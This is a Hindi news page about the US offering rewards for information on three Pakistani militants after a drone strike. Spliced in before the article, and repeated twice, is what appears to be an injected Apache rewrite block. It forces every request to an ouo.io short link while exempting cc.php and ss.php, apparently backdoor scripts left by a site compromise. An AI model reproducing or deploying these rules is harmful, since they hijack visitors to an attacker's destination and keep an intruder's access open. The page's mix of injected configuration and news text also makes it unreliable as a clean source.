
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 300
Previousवॉशिंगटन। अफगानिस्तान और उसके आसपास पनप रहे आतंकवाद पर अमेरिका ने फिर से सख्त रुख अख्तियार कर लिया है। ड्रोन हमले के बाद अब अमेरिका ने तीन बड़े पाकिस्तानी आतंकियों की जानकारी देनेवालों को इनाम देने की घोषणा की है। कुल मिलाकर इनाम की रकम 70 करोड़ रुपए है। अमेरिकी गृह मंत्रालय द्वारा जारी सूचना के मुताबिक, मुल्ला फजलुल्लाह, अब्दुल वली और मनाल वाघ की जानकारी देनेवालों को इनाम दिया जाएगा। मुल्ला पर 5 मिलियन डॉलर (तकरीबन 32 करोड़ रुपए) और बाकी दोनों पर तीन-तीन मिलियन डॉलर (करीब 19-19 करोड़ रुपए) का इनाम है।
आपको बता दें कि इससे पहले अमेरिका ने अफगानिस्तान पर ड्रोन हमला किया था, जिसमें कथित तौर पर मुल्ला का बेटा भी मारा गया है। उस हमले में 21 विद्रोहियों के मारे जाने की बात कही जा रही है।
मुल्ला तहरीक ए तालिबान का प्रमुख है। वह कई आतंकी साजिशों में शामिल रहा है। उसने ही मलाला युसुफजई पर हमला करवाया था। कथित तौर पर उसने 2010 में न्यू यॉर्क के टाइम्स स्कॉयर में भी हमला करने का प्लान बनाया था, लेकिन वह विफल रहा। आपको बता दें कि इससे पहले कई बार मुल्ला के मारे जाने की खबरें भी आती रही हैं, फिर बाद में वे गलत निकलती हैं। माना जाता है कि वह अफगानिस्तान में कहीं छिपा हुआ है।